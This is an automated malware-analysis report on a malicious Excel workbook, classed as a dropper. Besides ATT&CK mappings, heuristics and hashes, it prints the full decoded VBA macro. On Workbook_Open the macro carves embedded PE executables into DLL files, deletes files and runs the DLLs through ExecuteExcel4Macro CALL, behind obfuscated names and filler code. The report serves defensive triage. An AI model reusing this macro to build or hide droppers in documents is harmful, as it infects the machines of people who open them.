Verdict: MALICIOUS
Risk Score: 450

MITRE ATT&CK
- T1059.005 Visual Basic
- T1106 Execution through API
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment

Malware Insights
The sample is an Excel document containing VBA macros that trigger on Workbook_Open. These macros utilize Shell() calls and references to Windows Script Host, LoadLibrary, and GetProcAddress APIs to execute an embedded PE executable. This executable is detected by ClamAV as Win.Dropper.Hideproc-6663113-0, indicating its role as a dropper for further malicious payloads.
Heuristics (11)
- ClamAV: Win.Dropper.Hideproc-6663113-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
- Embedded PE executable (critical, OLE_EMBEDDED_EXE): MZ/PE header found inside document; possible embedded executable
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script, with surrounding context:
  sendings = 1
  Dim sNMSP As New Shell
  FlagDouble = True
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script, with surrounding context:
  Attribute VB_Customizable = True
  Private Sub Workbook_Open()
  If WelcomeDialog.Visible = True Then
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Reference to LoadLibrary API (high, SC_STR_LOADLIBRARY): Reference to LoadLibrary API
- Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS): Reference to GetProcAddress API
- Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11007 bytes |

SHA-256: 6d5848e5da2487303aa21be6e2bc29ebddbd8c24ae468ac63051e339648f1846

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module0.WuzzyBud 800
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Activate()
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
End Sub
Attribute VB_Name = "Repositor"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Dim vSpeed As Integer
Dim vLicensePlate As String
Public Property Get Speed() As Integer
Speed = vSpeed
End Property
Public Property Let Speed(sp As Integer)
vSpeed = Application.WorksheetFunction.Min(sp, 100)
vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)
End Property
Public Property Get SpecialFolders() As String
LicensePlate = vLicensePlate
End Property
Public Property Let LicensePlate(lp As String)
If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
vLicensePlate = lp
End Property
Attribute VB_Name = "Module0"
Public Sub WuzzyBud(dImmer As Integer)
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Dim ActiveHotbit As New WshShell
Dim s As String
Dim GetInfirmityLevelDescription As String
Dim d As Long
d = 3
d = d - 1
Select Case d
Case 0
s = "No health problems"
Case 1
s = "Minor health problems"
Case 2
s = "Major health problems"
Case 3
s = "Severe disability"
End Select
Dim car As Repositor
Dim SpecialPath As String
PRP = "%" & Dialog4.TextBox1.Tag
Dialog4.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")
Set car = New Repositor
Dialog4.TextBox3.Tag = car.CheckCar(ActiveHotbit, Dialog4.TextBox3.Tag & "")
ChDir (Dialog4.TextBox1.Tag)
If WelcomeDialog.Visible = False Then
WelcomeDialog.Show
End If
End Sub
Attribute VB_Name = "Module1"
Public Const FirstB As Byte = 77
Public Const SecondB As Byte = 90
Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
Dim i As Long
Dim j As Integer
Dim c As String
Dim tooolsetChunkI As Boolean
Dim tooolsetChunkQ As Boolean
j = 1
tooolsetChunkI = False
tooolsetChunkQ = False
GetP.aram = ""
For i = 1 To Len(Comma.nd$)
c = Mi.d$(Comma.nd$, i, 1)
If tooolsetChunkI Then
If c = """" Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
If c = " " Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
Else
If c = """" Then
If j > Count Then Exit Sub
tooolsetChunkI = True
tooolsetChunkQ = True
ElseIf c <> " ccc" Then
End If
End If
If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
Next i
End Sub
Attribute VB_Name = "Module2"
Public Sub DerTip()
Dim sendings As Integer
dershlep = "" + Dialog4.TextBox1.Tag
Dim ofbl As String
Dim sOfbl As String
ofbl = Dialog4.TextBox3.Tag + "\libConfig"
Dim CurrentSizeOfAT As Long
ctackPup = Dialog4.TextBox1.Tag + "\mannua"
ctackPup = ctackPup + "l.xlsx"
ctackPop = dershlep & Dialog4.TextBox3.Value
Dim arr(1 To 3) As String
ctackPip = ctackPup & Page11.Range("A115").Value
PublicResumEraseByArrayList ofbl + "*", ctackPop, ctackPip
VistaQ ctackPup
FileCopy ctackPup, ctackPip
sendings = 1
Dim sNMSP As New Shell
FlagDouble = True
Lrigat = Dialog4.Label11.Tag
If sendings > 0 And sendings > -30 Then
Set DestinationKat = sNMSP.Namespace(dershlep)
Set harvest = sNMSP.Namespace(ctackPip)
End If
DestinationKat.CopyHere harvest.Items.Item(Lrigat)
For StepBit = 1 To 2
CurrentSizeOfAT = 328192
sendings = 1
sendingsCSTR = "1"
If FlagDouble Then
CurrentSizeOfAT = 200000 + 60600 + 8
sendings = 2
FlagDouble = False
sendingsCSTR = "2"
End If
sOfbl = ofbl + sendingsCSTR + ".dll"
Composition dershlep & Dialog4.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings
If sendings < 100 Then
sendings = sendings + 1
sendings = sendings + 1
End If
If -100 <= sendings Then
sendings = sendings + 1
ChDir Dialog4.TextBox3.Tag
sendings = sendings + 1
End If
If sendings < 0 Then
sendings = sendings + 1
sendings = sendings + 1
End If
sOfbl = """" + sOfbl & ""","""
varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "runday"",""J"")")
If IsNumeric(varRes1) Then
If varRes1 = 0 Then
Exit Sub
End If
End If
Next
End Sub
Public Sub VistaQ(WhereToGo)
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
DoEvents
ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
DoEvents
ActiveWorkbook.Close
DoEvents
End Sub
Attribute VB_Name = "Module4"
Public Sub GetParam(Count As Integer)
Dim i As Long
Dim j As Integer
Dim c As String
Dim tooolsetChunkI As Boolean
Dim tooolsetChunkQ As Boolean
j = 1
tooolsetChunkI = False
tooolsetChunkQ = False
GetP.aram = ""
For i = 1 To Len(Comma.nd$)
c = Mi.d$(Comma.nd$, i, 1)
If tooolsetChunkI Then
If c = """" Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
If c = " " Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
Else
If c = """" Then
If j > Count Then Exit Sub
tooolsetChunkI = True
tooolsetChunkQ = True
ElseIf c <> " " Then
tooolsetChunkI = True
End If
End If
If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
Next i
End Sub
Attribute VB_Name = "Module5"
Public DisputeChannel3 As Byte
Public HurricanMoes() As Byte
Public abbrev As Byte
Dim DecemberUpdate As Byte
Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
On Error Resume Next
For Each Key In putArrayBigList
Kill Key
Next Key
On Error GoTo 0
End Sub
Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
Dim DisputeChannel1 As Long
Dim SimpleMethod As Integer
ReDim HurricanMoes(1 To fl)
DisputeChannel1 = FreeFile
Open Composition2 For Binary Access Read As DisputeChannel1
Dim fuZzy As Integer
fuZzy = 1
Do While 1
Get DisputeChannel1, , abbrev
If abbrev = FirstB Then
HurricanMoes(1) = abbrev
Get DisputeChannel1, , DisputeChannel3
If DisputeChannel3 = SecondB Then
HurricanMoes(2) = DisputeChannel3
Get DisputeChannel1, , DecemberUpdate
If DecemberUpdate = ThirdB Then
HurricanMoes(3) = DecemberUpdate
If fuZzy = DisputeChannel6 Then
For k = 4 To fl
Get DisputeChannel1, , abbrev
HurricanMoes(k) = abbrev
Next k
Exit Do
Else
fuZzy = fuZzy + 1
End If
End If
End If
End If
Loop
Close DisputeChannel1
On Error Resume Next
DisputeChannel1 = FreeFile
Open ofbl For Binary Lock Read Write As #DisputeChannel1
zeroBob = 1
For i = zeroBob To UBound(HurricanMoes)
If WelcomeDialog.Enabled = True Then
Put #DisputeChannel1, , HurricanMoes(i)
End If
Next i
Close DisputeChannel1
DisputeChannel1 = FreeFile
For HSP = 33 To -1 Step -0.25
DisputeChannel1 = 6 + i
Next HSP
End Sub
Attribute VB_Name = "Dialog4"
Attribute VB_Base = "0{466D64D5-C28A-40CF-9B6E-979786F07EBA}{3B9877C1-D161-4596-B086-1A549513FECB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{92A9393B-3F5E-470D-B46C-19191FCC4246}{C8B3DF52-2EFF-4BDF-A0C1-BAF16B946ADC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_00001b53.exe | embedded-pe | Office MZ+PE at offset 0x1B53 | 843949 bytes |

SHA-256: 3377abb8ea2fb738a5057812eaef36146f1d2d329e0357b442131f3efae6ed86

Detection: ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely. Static shellcode analysis recovered command string(s): WScript.Shell. Carved macro source contains an auto-exec entry point and execution/download terms.

| Filename | Kind | Source | Size |
|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD00D73BAE/Ole10Native | 593311 bytes |

SHA-256: b1fa392bb373223ddc3daa16b23f155332e3196967318068a95ad72d6d72c0a9